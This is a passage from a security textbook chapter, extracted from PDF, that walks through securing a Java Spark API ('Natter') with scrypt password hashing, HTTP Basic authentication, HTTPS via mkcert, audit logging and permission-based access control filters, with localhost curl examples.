import com.lambdaworks.crypto.*;
import org.dalesbred.*;
import org.json.*;
import spark.*;
import java.nio.charset.*;
import java.util.*;
import static spark.Spark.*;
public class UserController {
private static final String USERNAME_PATTERN =
"[a-zA-Z][a-zA-Z0-9]{1,29}";
private final Database database;
public UserController(Database database) {
this.database = database;
}
public JSONObject registerUser(Request request,
Response response) throws Exception {
var json = new JSONObject(request.body());
5 https://tools.ietf.org/html/rfc5802
6 https://blog.cryptographyengineering.com/2018/10/19/lets-talk-about-pake/
Listing 3.2
Registering a new user
75
Authentication to prevent spoofing
var username = json.getString("username");
var password = json.getString("password");
if (!username.matches(USERNAME_PATTERN)) {
throw new IllegalArgumentException("invalid username");
}
if (password.length() < 8) {
throw new IllegalArgumentException(
"password must be at least 8 characters");
}
var hash = SCryptUtil.scrypt(password, 32768, 8, 1);
database.updateUnique(
"INSERT INTO users(user_id, pw_hash)" +
" VALUES(?, ?)", username, hash);
response.status(201);
response.header("Location", "/users/" + username);
return new JSONObject().put("username", username);
}
}
The Scrypt library generates a unique random salt value for each password hash. The
hash string that gets stored in the database includes the parameters that were used
when the hash was generated, as well as this random salt value. This ensures that you
can always recreate the same hash in future, even if you change the parameters. The
Scrypt library will be able to read this value and decode the parameters when it veri-
fies the hash.
DEFINITION
A salt is a random value that is mixed into the password when it is
hashed. Salts ensure that the hash is always different even if two users have the
same password. Without salts, an attacker can build a compressed database of
common password hashes, known as a rainbow table, which allows passwords to
be recovered very quickly.
You can then add a new route for registering a new user to your Main class. Locate the
Main.java file in your editor and add the following lines just below where you previ-
ously created the SpaceController object:
var userController = new UserController(database);
post("/users", userController::registerUser);
3.3.5
Authenticating users
To authenticate a user, you’ll extract the username and password from the HTTP
Basic authentication header, look up the corresponding user in the database, and
finally verify the password matches the hash stored for that user. Behind the scenes,
the Scrypt library will extract the salt from the stored password hash, then hash the sup-
plied password with the same salt and parameters, and then finally compare the hashed
Apply the same
username validation
that you used before.
Use the Scrypt library
to hash the password.
Use the recommended
parameters for 2019.
Use a prepared statement
to insert the username
and hash.
76
CHAPTER 3
Securing the Natter API
password with the stored hash. If they match, then the user must have presented the
same password and so authentication succeeds, otherwise it fails.
Listing 3.3 implements this check as a filter that is called before every API call. First
you check if there is an Authorization header in the request, with the Basic authenti-
cation scheme. Then, if it is present, you can extract and decode the Base64-encoded
credentials. Validate the username as always and look up the user from the database.
Finally, use the Scrypt library to check whether the supplied password matches the
hash stored for the user in the database. If authentication succeeds, then you should
store the username in an attribute on the request so that other handlers can see it;
otherwise, leave it as null to indicate an unauthenticated user. Open the UserController
.java file that you previously created and add the authenticate method as given in the
listing.
public void authenticate(Request request, Response response) {
var authHeader = request.headers("Authorization");
if (authHeader == null || !authHeader.startsWith("Basic ")) {
return;
}
var offset = "Basic ".length();
var credentials = new String(Base64.getDecoder().decode(
authHeader.substring(offset)), StandardCharsets.UTF_8);
var components = credentials.split(":", 2);
if (components.length != 2) {
throw new IllegalArgumentException("invalid auth header");
}
var username = components[0];
var password = components[1];
if (!username.matches(USERNAME_PATTERN)) {
throw new IllegalArgumentException("invalid username");
}
var hash = database.findOptional(String.class,
"SELECT pw_hash FROM users WHERE user_id = ?", username);
if (hash.isPresent() &&
SCryptUtil.check(password, hash.get())) {
request.attribute("subject", username);
}
}
You can wire this into the Main class as a filter in front of all API calls. Open the
Main.java file in your text editor again, and add the following line to the main method
underneath where you created the userController object:
before(userController::authenticate);
Listing 3.3
Authenticating a request
Check to see if there
is an HTTP Basic
Authorization
header.
Decode the
credentials using
Base64 and UTF-8.
Split the credentials
into username and
password.
If the user exists,
then use the Scrypt
library to check
the password.
77
Authentication to prevent spoofing
You can now update your API methods to check that the authenticated user matches
any claimed identity in the request. For example, you can update the Create Space
operation to check that the owner field matches the currently authenticated user. This
also allows you to skip validating the username, because you can rely on the authenti-
cation service to have done that already. Open the SpaceController.java file in your
editor and change the createSpace method to check that the owner of the space
matches the authenticated subject, as in the following snippet:
public JSONObject createSpace(Request request, Response response) {
..
var owner = json.getString("owner");
var subject = request.attribute("subject");
if (!owner.equals(subject)) {
throw new IllegalArgumentException(
"owner must match authenticated user");
}
..
}
You could in fact remove the owner field from the request and always use the authen-
ticated user subject, but for now you’ll leave it as-is. You can do the same in the Post
Message operation in the same file:
var user = json.getString("author");
if (!user.equals(request.attribute("subject"))) {
throw new IllegalArgumentException(
"author must match authenticated user");
}
You’ve now enabled authentication for your API—every time a user makes a claim
about their identity, they are required to authenticate to provide proof of that claim.
You’re not yet enforcing authentication on all API calls, so you can still read messages
without being authenticated. You’ll tackle that shortly when you look at access control.
The checks we have added so far are part of the application logic. Now let’s try out
how the API works. First, let’s try creating a space without authenticating:
$ curl -d '{"name":"test space","owner":"demo"}'
➥ -H 'Content-Type: application/json' http://localhost:4567/spaces
{"error":"owner must match authenticated user"}
Good, that was prevented. Let’s use curl now to register a demo user:
$ curl -d '{"username":"demo","password":"password"}’'
➥ -H 'Content-Type: application/json' http://localhost:4567/users
{"username":"demo"}
78
CHAPTER 3
Securing the Natter API
Finally, you can repeat your Create Space request with correct authentication
credentials:
$ curl -u demo:password -d '{"name":"test space","owner":"demo"}'
➥ -H 'Content-Type: application/json' http://localhost:4567/spaces
{"name":"test space","uri":"/spaces/1"}
3.4
Using encryption to keep data private
Introducing authentication into your API protects against spoofing threats. However,
requests to the API, and responses from it, are not protected in any way, leading to
tampering and information disclosure threats. Imagine that you were trying to check
the latest gossip from your work party while connected to a public wifi hotspot in your
local coffee shop. Without encryption, the messages you send to and from the API will
be readable by anybody else connected to the same hotspot.
Your simple password authentication scheme is also vulnerable to this snooping, as
an attacker with access to the network can simply read your Base64-encoded pass-
words as they go by. They can then impersonate any user whose password they have
stolen. It’s often the case that threats are linked together in this way. An attacker can
take advantage of one threat, in this case information disclosure from unencrypted
communications, and exploit that to pretend to be somebody else, undermining your
API’s authentication. Many successful real-world attacks result from chaining together
multiple vulnerabilities rather than exploiting just one mistake.
Pop quiz
3
Which of the following are desirable properties of a secure password hashing
algorithm? (There may be several correct answers.)
a
It should be easy to parallelize.
b
It should use a lot of storage on disk.
c
It should use a lot of network bandwidth.
d
It should use a lot of memory (several MB).
e
It should use a random salt for each password.
f
It should use a lot of CPU power to try lots of passwords.
4
What is the main reason why HTTP Basic authentication should only be used over an
encrypted communication channel such as HTTPS? (Choose one answer.)
a
The password can be exposed in the Referer header.
b
HTTPS slows down attackers trying to guess passwords.
c
The password might be tampered with during transmission.
d
Google penalizes websites in search rankings if they do not use HTTPS.
e
The password can easily be decoded by anybody snooping on network traffic.
The answers are at the end of the chapter.
79
Using encryption to keep data private
In this case, sending passwords in clear text is a pretty big vulnerability, so let’s fix
that by enabling HTTPS. HTTPS is normal HTTP, but the connection occurs over
Transport Layer Security (TLS), which provides encryption and integrity protection.
Once correctly configured, TLS is largely transparent to the API because it occurs at a
lower level in the protocol stack and the API still sees normal requests and responses.
Figure 3.5 shows how HTTPS fits into the picture, protecting the connections between
your users and the API.
In addition to protecting data in transit (on the way to and from our application), you
should also consider protecting any sensitive data at rest, when it is stored in your
application’s database. Many different people may have access to the database, as a
legitimate part of their job, or due to gaining illegitimate access to it through some
other vulnerability. For this reason, you should also consider encrypting private data
in the database, as shown in figure 3.5. In this chapter, we will focus on protecting
data in transit with HTTPS and discuss encrypting data in the database in chapter 5.
TLS or SSL?
Transport Layer Security (TLS) is a protocol that sits on top of TCP/IP and provides
several basic security functions to allow secure communication between a client and
a server. Early versions of TLS were known as the Secure Socket Layer, or SSL, and
you’ll often still hear TLS referred to as SSL. Application protocols that use TLS
often have an S appended to their name, for example HTTPS or LDAPS, to stand for
“secure.”
Web browser
Natter API
Audit log
Authentication
Request
Response
Access control
Rate-limiting
Mobile app
Application
database
HTTPS is used to
encrypt and protect
data being transmitted
(in transit) to and from
your API.
Encryption should also
be used to protect sensitive
data at rest in your
application database.
Inside your API,
requests and responses
are unencrypted.
Application
logic
Figure 3.5
Encryption is used to protect data in transit between a client and our API, and at
rest when stored in the database.
80
CHAPTER 3
Securing the Natter API
3.4.1
Enabling HTTPS
Enabling HTTPS support in Spark is straightforward. First, you need to generate a
certificate that the API will use to authenticate itself to its clients. TLS certificates are
covered in depth in chapter 7. When a client connects to your API it will use a URI
that includes the hostname of the server the API is running on, for example api
.example.com. The server must present a certificate, signed by a trusted certificate
authority (CA), that says that it really is the server for api.example.com. If an invalid
certificate is presented, or it doesn’t match the host that the client wanted to connect
to, then the client will abort the connection. Without this step, the client might be
tricked into connecting to the wrong server and then send its password or other confi-
dential data to the imposter.
Because you’re enabling HTTPS for development purposes only, you could use a
self-signed certificate. In later chapters you will connect to the API directly in a web
browser, so it is much easier to use a certificate signed by a local CA. Most web brows-
ers do not like self-signed certificates. A tool called mkcert (https://mkcert.dev) sim-
plifies the process considerably. Follow the instructions on the mkcert homepage to
install it, and then run
mkcert -install
to generate the CA certificate and install it. The CA cert will automatically be marked
as trusted by web browsers installed on your operating system.
DEFINITION
A self-signed certificate is a certificate that has been signed using the
private key associated with that same certificate, rather than by a trusted cer-
tificate authority. Self-signed certificates should be used only when you have a
direct trust relationship with the certificate owner, such as when you gener-
ated the certificate yourself.
You can now generate a certificate for your Spark server running on localhost. By
default, mkcert generates certificates in Privacy Enhanced Mail (PEM) format. For
Java, you need the certificate in PKCS#12 format, so run the following command in
the root folder of the Natter project to generate a certificate for localhost:
mkcert -pkcs12 localhost
(continued)
TLS ensures confidentiality and integrity of data transmitted between the client and
server. It does this by encrypting and authenticating all data flowing between the two
parties. The first time a client connects to a server, a TLS handshake is performed
in which the server authenticates to the client, to guarantee that the client connected
to the server it wanted to connect to (and not to a server under an attacker’s control).
Then fresh cryptographic keys are negotiated for this session and used to encrypt and
authenticate every request and response from then on. You’ll look in depth at TLS
and HTTPS in chapter 7.
81
Using encryption to keep data private
The certificate and private key will be generated in a file called localhost.p12. By
default, the password for this file is changeit. You can now enable HTTPS support in
Spark by adding a call to the secure() static method, as shown in listing 3.4. The first
two arguments to the method give the name of the keystore file containing the server
certificate and private key. Leave the remaining arguments as null; these are only
needed if you want to support client certificate authentication (which is covered in
chapter 11).
WARNING
The CA certificate and private key that mkcert generates can be
used to generate certificates for any website that will be trusted by your browser.
Do not share these files or send them to anybody. When you have finished
development, consider running mkcert -uninstall to remove the CA from
your system trust stores.
import static spark.Spark.secure;
public class Main {
public static void main(String... args) throws Exception {
secure("localhost.p12", "changeit", null, null);
..
}
}
Restart the server for the changes to take effect. If you started the server from the
command line, then you can use Ctrl-C to interrupt the process and then simply run it
again. If you started the server from your IDE, then there should be a button to restart
the process.
Finally, you can call your API (after restarting the server). If curl refuses to con-
nect, you can use the --cacert option to curl to tell it to trust the mkcert certificate:
$ curl --cacert "$(mkcert -CAROOT)/rootCA.pem"
➥ -d ‘{"username":"demo","password":"password"}’
➥ -H ‘Content-Type: application/json’ https://localhost:4567/users
{"username":"demo"}
WARNING
Don’t be tempted to disable TLS certificate validation by passing
the -k or --insecure options to curl (or similar options in an HTTPS
library). Although this may be OK in a development environment, disabling
certificate validation in a production environment undermines the security
guarantees of TLS. Get into the habit of generating and using correct certifi-
cates. It’s not much harder, and you’re less likely to make mistakes later.
Listing 3.4
Enabling HTTPS
Import the secure method.
Enable HTTPS support
at the start of the main
method.
82
CHAPTER 3
Securing the Natter API
3.4.2
Strict transport security
When a user visits a website in a browser, the browser will first attempt to connect to
the non-secure HTTP version of a page as many websites still do not support HTTPS.
A secure site will redirect the browser to the HTTPS version of the page. For an API,
you should only expose the API over HTTPS because users will not be directly con-
necting to the API endpoints using a web browser and so you do not need to support
this legacy behavior. API clients also often send sensitive data such as passwords on the
first request so it is better to completely reject non-HTTPS requests. If for some rea-
son you do need to support web browsers directly connecting to your API endpoints,
then best practice is to immediately redirect them to the HTTPS version of the API
and to set the HTTP Strict-Transport-Security (HSTS) header to instruct the browser
to always use the HTTPS version in future. If you add the following line to the after-
After filter in your main method, it will add an HSTS header to all responses:
response.header("Strict-Transport-Security", "max-age=31536000");
TIP
Adding a HSTS header for localhost is not a good idea as it will prevent
you from running development servers over plain HTTP until the max-age
attribute expires. If you want to try it out, set a short max-age value.
3.5
Audit logging for accountability
Accountability relies on being able to determine who did what and when. The sim-
plest way to do this is to keep a log of actions that people perform using your API,
known as an audit log. Figure 3.6 repeats the mental model that you should have for
the mechanisms discussed in this chapter. Audit logging should occur after authenti-
cation, so that you know who is performing an action, but before you make authoriza-
tion decisions that may deny access. The reason for this is that you want to record all
attempted operations, not just the successful ones. Unsuccessful attempts to perform
actions may be indications of an attempted attack. It’s difficult to overstate the impor-
tance of good audit logging to the security of an API. Audit logs should be written to
durable storage, such as the file system or a database, so that the audit logs will survive
if the process crashes for any reason.
Pop quiz
5
Recalling the CIA triad from chapter 1, which one of the following security goals is
not provided by TLS?
a
Confidentiality
b
Integrity
c
Availability
The answer is at the end of the chapter.
83
Audit logging for accountability
Thankfully, given the importance of audit logging, it’s easy to add some basic logging
capability to your API. In this case, you’ll log into a database table so that you can eas-
ily view and search the logs from the API itself.
TIP
In a production environment you typically will want to send audit logs
to a centralized log collection and analysis tool, known as a SIEM (Security
Information and Event Management) system, so they can be correlated with
logs from other systems and analyzed for potential threats and unusual
behavior.
As for previous new functionality, you’ll add a new database table to store the audit
logs. Each entry will have an identifier (used to correlate the request and response
logs), along with some details of the request and the response. Add the following table
definition to schema.sql.
NOTE
The audit table should not have any reference constraints to any other
tables. Audit logs should be recorded based on the request, even if the details
are inconsistent with other data.
CREATE TABLE audit_log(
audit_id INT NULL,
method VARCHAR(10) NOT NULL,
path VARCHAR(100) NOT NULL,
user_id VARCHAR(30) NULL,
status INT NULL,
Web browser
Natter API
Audit log
Authentication
Application
logic
Request
Response
Access control
Audit
DB
Rate-limiting
Mobile app
Audit logging occurs
after authentication so
we know who is sending
the request.
Responses should be logged
as well as requests, especially
if access is denied.
Audit logs should be
written to durable
storage.
Figure 3.6
Audit logging should occur both before a request is processed and after it completes.
When implemented as a filter, it should be placed after authentication, so that you know who is
performing each action, but before access control checks so that you record operations that were
attempted but denied.
84
CHAPTER 3
Securing the Natter API
audit_time TIMESTAMP NOT NULL
);
CREATE SEQUENCE audit_id_seq;
As before, you also need to grant appropriate permissions to the natter_api_user, so
in the same file add the following line to the bottom of the file and save:
GRANT SELECT, INSERT ON audit_log TO natter_api_user;
A new controller can now be added to handle the audit logging. You split the logging
into two filters, one that occurs before the request is processed (after authentication),
and one that occurs after the response has been produced. You’ll also allow access to the
logs to anyone for illustration purposes. You should normally lock down audit logs to
only a small number of trusted users, as they are often sensitive in themselves. Often the
users that can access audit logs (auditors) are different from the normal system adminis-
trators, as administrator accounts are the most privileged and so most in need of moni-
toring. This is an important security principle known as separation of duties.
DEFINITION
The principle of separation of duties requires that different aspects
of privileged actions should be controlled by different people, so that no one
person is solely responsible for the action. For example, a system administra-
tor should not also be responsible for managing the audit logs for that system.
In financial systems, separation of duties is often used to ensure that the per-
son who requests a payment is not also the same person who approves the
payment, providing a check against fraud.
In your editor, navigate to src/main/java/com/manning/apisecurityinaction/controller
and create a new file called AuditController.java. Listing 3.5 shows the content of this
new controller that you should copy into the file and save. As mentioned, the logging
is split into two filters: one of which runs before each operation, and one which runs
afterward. This ensures that if the process crashes while processing a request you can
still see what requests were being processed at the time. If you only logged responses,
then you’d lose any trace of a request if the process crashes, which would be a prob-
lem if an attacker found a request that caused the crash. To allow somebody reviewing
the logs to correlate requests with responses, generate a unique audit log ID in the
auditRequestStart method and add it as an attribute to the request. In the audit-
RequestEnd method, you can then retrieve the same audit log ID so that the two log
events can be tied together.
package com.manning.apisecurityinaction.controller;
import org.dalesbred.*;
import org.json.*;
import spark.*;
Listing 3.5
The audit log controller
85
Audit logging for accountability
import java.sql.*;
import java.time.*;
import java.time.temporal.*;
public class AuditController {
private final Database database;
public AuditController(Database database) {
this.database = database;
}
public void auditRequestStart(Request request, Response response) {
database.withVoidTransaction(tx -> {
var auditId = database.findUniqueLong(
"SELECT NEXT VALUE FOR audit_id_seq");
request.attribute("audit_id", auditId);
database.updateUnique(
"INSERT INTO audit_log(audit_id, method, path, " +
"user_id, audit_time) " +
"VALUES(?, ?, ?, ?, current_timestamp)",
auditId,
request.requestMethod(),
request.pathInfo(),
request.attribute("subject"));
});
}
public void auditRequestEnd(Request request, Response response) {
database.updateUnique(
"INSERT INTO audit_log(audit_id, method, path, status, " +
"user_id, audit_time) " +
"VALUES(?, ?, ?, ?, ?, current_timestamp)",
request.attribute("audit_id"),
request.requestMethod(),
request.pathInfo(),
response.status(),
request.attribute("subject"));
}
}
Listing 3.6 shows the code for reading entries from the audit log for the last hour. The
entries are queried from the database and converted into JSON objects using a cus-
tom RowMapper method. The list of records is then returned as a JSON array. A simple
limit is added to the query to prevent too many results from being returned.
public JSONArray readAuditLog(Request request, Response response) {
var since = Instant.now().minus(1, ChronoUnit.HOURS);
var logs = database.findAll(AuditController::recordToJson,
"SELECT * FROM audit_log " +
"WHERE audit_time >= ? LIMIT 20", since);
Listing 3.6
Reading audit log entries
Generate a new audit id before
the request is processed and
save it as an attribute on the
request.
When processing the
response, look up
the audit id from the
request attributes.
Read log
entries for
the last hour.
86
CHAPTER 3
Securing the Natter API
return new JSONArray(logs);
}
private static JSONObject recordToJson(ResultSet row)
throws SQLException {
return new JSONObject()
.put("id", row.getLong("audit_id"))
.put("method", row.getString("method"))
.put("path", row.getString("path"))
.put("status", row.getInt("status"))
.put("user", row.getString("user_id"))
.put("time", row.getTimestamp("audit_time").toInstant());
}
We can then wire this new controller into your main method, taking care to insert the
filter between your authentication filter and the access control filters for individual
operations. Because Spark filters must either run before or after (and not around) an
API call, you define separate filters to run before and after each request.
Open the Main.java file in your editor and locate the lines that install the filters
for authentication. Audit logging should come straight after authentication, so you
should add the audit filters in between the authentication filter and the first route
definition, as highlighted in bold in this next snippet. Add the indicated lines and
then save the file.
before(userController::authenticate);
var auditController = new AuditController(database);
before(auditController::auditRequestStart);
afterAfter(auditController::auditRequestEnd);
post("/spaces",
spaceController::createSpace);
Finally, you can register a new (unsecured) endpoint for reading the logs. Again, in a
production environment this should be disabled or locked down:
get("/logs", auditController::readAuditLog);
Once installed and the server has been restarted, make some sample requests, and
then view the audit log. You can use the jq utility (https://stedolan.github.io/jq/) to
pretty-print the output:
$ curl pem https://localhost:4567/logs | jq
[
{
"path": "/users",
"method": "POST",
"id": 1,
"time": "2019-02-06T17:22:44.123Z"
},
Convert each entry into a JSON
object and collect as a JSON array.
Use a helper
method to
convert the
records to
JSON.
Add these lines to
create and register
the audit controller.
87
Access control
{
"path": "/users",
"method": "POST",
"id": 1,
"time": "2019-02-06T17:22:44.237Z",
"status": 201
},
{
"path": "/spaces/1/messages/1",
"method": "DELETE",
"id": 2,
"time": "2019-02-06T17:22:55.266Z",
"user": "demo"
},...
]
This style of log is a basic access log, that logs the raw HTTP requests and responses to
your API. Another way to create an audit log is to capture events in the business logic
layer of your application, such as User Created or Message Posted events. These events
describe the essential details of what happened without reference to the specific pro-
tocol used to access the API. Yet another approach is to capture audit events directly
in the database using triggers to detect when data is changed. The advantage of these
alternative approaches is that they ensure that events are logged no matter how the
API is accessed, for example, if the same API is available over HTTP or using a binary
RPC protocol. The disadvantage is that some details are lost, and some potential
attacks may be missed due to this missing detail.
3.6
Access control
You now have a reasonably secure password-based authentication mechanism in place,
along with HTTPS to secure data and passwords in transmission between the API cli-
ent and server. However, you’re still letting any user perform any action. Any user can
post a message to any social space and read all the messages in that space. Any user
can also decide to be a moderator and delete messages from other users. To fix this,
you’ll now implement basic access control checks.
Pop quiz
6
Which secure design principle would indicate that audit logs should be managed
by different users than the normal system administrators?
a
The Peter principle
b
The principle of least privilege
c
The principle of defense in depth
d
The principle of separation of duties
e
The principle of security through obscurity
The answer is at the end of the chapter.
88
CHAPTER 3
Securing the Natter API
Access control should happen after authentication, so that you know who is trying
to perform the action, as shown in figure 3.7. If the request is granted, then it can pro-
ceed through to the application logic. However, if it is denied by the access control
rules, then it should be failed immediately, and an error response returned to the
user. The two main HTTP status codes for indicating that access has been denied are
401 Unauthorized and 403 Forbidden. See the sidebar for details on what these two
codes mean and when to use one or the other.
HTTP 401 and 403 status codes
HTTP includes two standard status codes for indicating that the client failed security
checks, and it can be confusing to know which status to use in which situations.
The 401 Unauthorized status code, despite the name, indicates that the server
required authentication for this request but the client either failed to provide any cre-
dentials, or they were incorrect, or they were of the wrong type. The server doesn’t know
if the user is authorized or not because they don’t know who they are. The client (or
user) may be able fix the situation by trying different credentials. A standard WWW-
Authenticate header can be returned to tell the client what credentials it needs, which
it will then return in the Authorization header. Confused yet? Unfortunately, the HTTP
specifications use the words authorization and authentication as if they were identical.
The 403 Forbidden status code, on the other hand, tells the client that its creden-
tials were fine for authentication, but that it’s not allowed to perform the operation it
requested. This is a failure of authorization, not authentication. The client cannot typ-
ically do anything about this other than ask the administrator for access.
Web browser
Natter API
Audit log
Authentication
Application
logic
Access control
Rate-limiting
Mobile app
When access is
granted, the request
proceeds to the
main API logic.
When access is
denied, the request
is immediately returned
with a 403 Forbidden.
Request
Response
Forbidden
requests
are always
logged.
Figure 3.7
Access control occurs after authentication and the request has been logged for audit.
If access is denied, then a forbidden response is immediately returned without running any of the
application logic. If access is granted, then the request proceeds as normal.
89
Access control
3.6.1
Enforcing authentication
The most basic access control check is simply to require that all users are authenti-
cated. This ensures that only genuine users of the API can gain access, while not
enforcing any further requirements. You can enforce this with a simple filter that runs
after authentication and verifies that a genuine subject has been recorded in the request
attributes. If no subject attribute is found, then it rejects the request with a 401 status
code and adds a standard WWW-Authenticate header to inform the client that the user
should authenticate with Basic authentication. Open the UserController.java file in
your editor, and add the following method, which can be used as a Spark before filter
to enforce that users are authenticated:
public void requireAuthentication(Request request,
Response response) {
if (request.attribute("subject") == null) {
response.header("WWW-Authenticate",
"Basic realm=\"/\", charset=\"UTF-8\"");
halt(401);
}
}
You can then open the Main.java file and require that all calls to the Spaces API are
authenticated, by adding the following filter definition. As shown in figure 3.7 and
throughout this chapter, access control checks like this should be added after authen-
tication and audit logging. Locate the line where you added the authentication filter
earlier and add a filter to enforce authentication on all requests to the API that start
with the /spaces URL path, so that the code looks like the following:
before(userController::authenticate);
before(auditController::auditRequestStart);
afterAfter(auditController::auditRequestEnd);
before("/spaces", userController::requireAuthentication);
post("/spaces", spaceController::createSpace); ..
If you save the file and restart the server, you can now see unauthenticated requests to
create a space be rejected with a 401 error asking for authentication, as in the follow-
ing example:
$ curl -i -d ‘{"name":"test space","owner":"demo"}’
➥ -H ‘Content-Type: application/json’ https://localhost:4567/spaces
HTTP/1.1 401 Unauthorized
Date: Mon, 18 Mar 2019 14:51:40 GMT
WWW-Authenticate: Basic realm="/", charset="UTF-8"
...
Retrying the request with authentication credentials allows it to succeed:
First, try to authenticate the user.
Then perform
audit logging.
Finally, add the check if
authentication was
successful.
90
CHAPTER 3
Securing the Natter API
$ curl -i -d ‘{"name":"test space","owner":"demo"}’
➥ -H ‘Content-Type: application/json’ -u demo:changeit
➥ https://localhost:4567/spaces
HTTP/1.1 201 Created
...
{"name":"test space","uri":"/spaces/1"}
3.6.2
Access control lists
Beyond simply requiring that users are authenticated, you may also want to impose
additional restrictions on who can perform certain operations. In this section, you’ll
implement a very simple access control method based upon whether a user is a mem-
ber of the social space they are trying to access. You’ll accomplish this by keeping track
of which users are members of which social spaces in a structure known as an access
control list (ACL).
Each entry for a space will list a user that may access that space, along with a set of
permissions that define what they can do. The Natter API has three permissions: read
messages in a space, post messages to that space, and a delete permission granted to
moderators.
DEFINITION
An access control list is a list of users that can access a given object,
together with a set of permissions that define what each user can do.
Why not simply let all authenticated users perform any operation? In some APIs this
may be an appropriate security model, but for most APIs some operations are more
sensitive than others. For example, you might let anyone in your company see their
own salary information in your payroll API, but the ability to change somebody’s sal-
ary is not normally something you would allow any employee to do! Recall the princi-
ple of least authority (POLA) from chapter 1, which says that any user (or process)
should be given exactly the right amount of authority to do the jobs they need to do.
Too many permissions and they may cause damage to the system. Too few permissions
and they may try to work around the security of the system to get their job done.
Permissions will be granted to users in a new permissions table, which links a
user to a set of permissions in a given social space. For simplicity, you’ll represent
permissions as a string of the characters r (read), w (write), and d (delete). Add the
following table definition to the bottom of schema.sql in your text editor and save
the new definition. It must come after the spaces and users table definitions as it
references them to ensure that permissions can only be granted for spaces that exist
and real users.
CREATE TABLE permissions(
space_id INT NOT NULL REFERENCES spaces(space_id),
user_id VARCHAR(30) NOT NULL REFERENCES users(user_id),
perms VARCHAR(3) NOT NULL,
PRIMARY KEY (space_id, user_id)
);
GRANT SELECT, INSERT ON permissions TO natter_api_user;
91
Access control
You then need to make sure that the initial owner of a space gets given all permissions.
You can update the createSpace method to grant all permissions to the owner in the
same transaction that we create the space. Open SpaceController.java in your text editor
and locate the createSpace method. Add the lines highlighted in the following listing:
return database.withTransaction(tx -> {
var spaceId = database.findUniqueLong(
"SELECT NEXT VALUE FOR space_id_seq;");
database.updateUnique(
"INSERT INTO spaces(space_id, name, owner) " +
"VALUES(?, ?, ?);", spaceId, spaceName, owner);
database.updateUnique(
"INSERT INTO permissions(space_id, user_id, perms) " +
"VALUES(?, ?, ?)", spaceId, owner, "rwd");
response.status(201);
response.header("Location", "/spaces/" + spaceId);
return new JSONObject()
.put("name", spaceName)
.put("uri", "/spaces/" + spaceId);
});
You now need to add checks to enforce that the user has appropriate permissions for
the actions that they are trying to perform. You could hard-code these checks into
each individual method, but it’s much more maintainable to enforce access control
decisions using filters that run before the controller is even called. This separation of
concerns ensures that the controller can concentrate on the core logic of the opera-
tion, without having to worry about access control details. This also ensures that if you
ever want to change how access control is performed, you can do this in the common
filter rather than changing every single controller method.
NOTE
Access control checks are often included directly in business logic,
because who has access to what is ultimately a business decision. This also
ensures that access control rules are consistently applied no matter how that
functionality is accessed. On the other hand, separating out the access con-
trol checks makes it easier to centralize policy management, as you’ll see in
chapter 8.
To enforce your access control rules, you need a filter that can determine whether the
authenticated user has the appropriate permissions to perform a given operation on a
given space. Rather than have one filter that tries to determine what operation is
being performed by examining the request, you’ll instead write a factory method that
returns a new filter given details about the operation. You can then use this to create
specific filters for each operation. Listing 3.7 shows how to implement this filter in
your UserController class.
Ensure the
space owner has
all permissions
on the newly
created space.
92
CHAPTER 3
Securing the Natter API
Open UserController.java and add the method in listing 3.7 to the class under-
neath the other existing methods. The method takes as input the name of the HTTP
method being performed and the permission required. If the HTTP method does not
match, then you skip validation for this operation, and let other filters handle it.
Before you can enforce any access control rules, you must first ensure that the user is
authenticated, so add a call to the existing requireAuthentication filter. Then you
can look up the authenticated user in the user database and determine if they have
the required permissions to perform this action, in this case by a simple string match-
ing against the permission letters. For more complex cases, you might want to convert
the permissions into a Set object and explicitly check that all required permissions
are contained in the set of permissions of the user.
TIP
The Java EnumSet class can be used to efficiently represent a set of per-
missions as a bit vector, providing a compact and fast way to quickly check if a
user has a set of required permissions.
If the user does not have the required permissions, then you should fail the request
with a 403 Forbidden status code. This tells the user that they are not allowed to per-
form the operation that they are requesting.
public Filter requirePermission(String method, String permission) {
return (request, response) -> {
if (!method.equalsIgnoreCase(request.requestMethod())) {
return;
}
requireAuthentication(request, response);
var spaceId = Long.parseLong(request.params(":spaceId"));
var username = (String) request.attribute("subject");
var perms = database.findOptional(String.class,
"SELECT perms FROM permissions " +
"WHERE space_id = ? AND user_id = ?",
spaceId, username).orElse("");
if (!perms.contains(permission)) {
halt(403);
}
};
}
3.6.3
Enforcing access control in Natter
You can now add filters to each operation in your main method, as shown in listing 3.8.
Before each Spark route you add a new before() filter that enforces correct permis-
sions. Each filter path has to have a :spaceId path parameter so that the filter can
Listing 3.7
Checking permissions in a filter
Return a
new Spark
filter as a
lambda
expression.
Ignore requests
that don’t match the
request method.
First check
if the user is
authenticated.
Look up permissions for
the current user in the
given space, defaulting
to no permissions.
If the user doesn’t have
permission, then halt with
a 403 Forbidden status.
93
Access control
determine which space is being operated on. Open the Main.java class in your editor
and ensure that your main() method matches the contents of listing 3.8. New filters
enforcing permission checks are highlighted in bold.
NOTE
The implementations of all API operations can be found in the GitHub
repository accompanying the book at https://github.com/NeilMadden/
apisecurityinaction.
public static void main(String... args) throws Exception {
…
before(userController::authenticate);
before(auditController::auditRequestStart);
afterAfter(auditController::auditRequestEnd);
before("/spaces",
userController::requireAuthentication);
post("/spaces",
spaceController::createSpace);
before("/spaces/:spaceId/messages",
userController.requirePermission("POST", "w"));
post("/spaces/:spaceId/messages",
spaceController::postMessage);
before("/spaces/:spaceId/messages/*",
userController.requirePermission("GET", "r"));
get("/spaces/:spaceId/messages/:msgId",
spaceController::readMessage);
before("/spaces/:spaceId/messages",
userController.requirePermission("GET", "r"));
get("/spaces/:spaceId/messages",
spaceController::findMessages);
var moderatorController =
new ModeratorController(database);
before("/spaces/:spaceId/messages/*",
userController.requirePermission("DELETE", "d"));
delete("/spaces/:spaceId/messages/:msgId",
moderatorController::deletePost);
post("/users", userController::registerUser);
…
}
Listing 3.8
Adding authorization filters
Before anything else,
you should try to
authenticate the user.
Anybody may create a space,
so you just enforce that the
user is logged in.
For each operation, you
add a before() filter that
ensures the user has
correct permissions.
Anybody can register an
account, and they won’t
be authenticated first.
94
CHAPTER 3
Securing the Natter API
With this in place, if you create a second user “demo2” and try to read a message cre-
ated by the existing demo user in their space, then you get a 403 Forbidden response:
$ curl -i -u demo2:password
➥ https://localhost:4567/spaces/1/messages/1
HTTP/1.1 403 Forbidden
...
3.6.4
Adding new members to a Natter space
So far, there is no way for any user other than the space owner to post or read mes-
sages from a space. It’s going to be a pretty antisocial social network unless you can
add other users! You can add a new operation that allows another user to be added to
a space by any existing user that has read permission on that space. The next listing
adds an operation to the SpaceController to allow this.
Open SpaceController.java in your editor and add the addMember method from
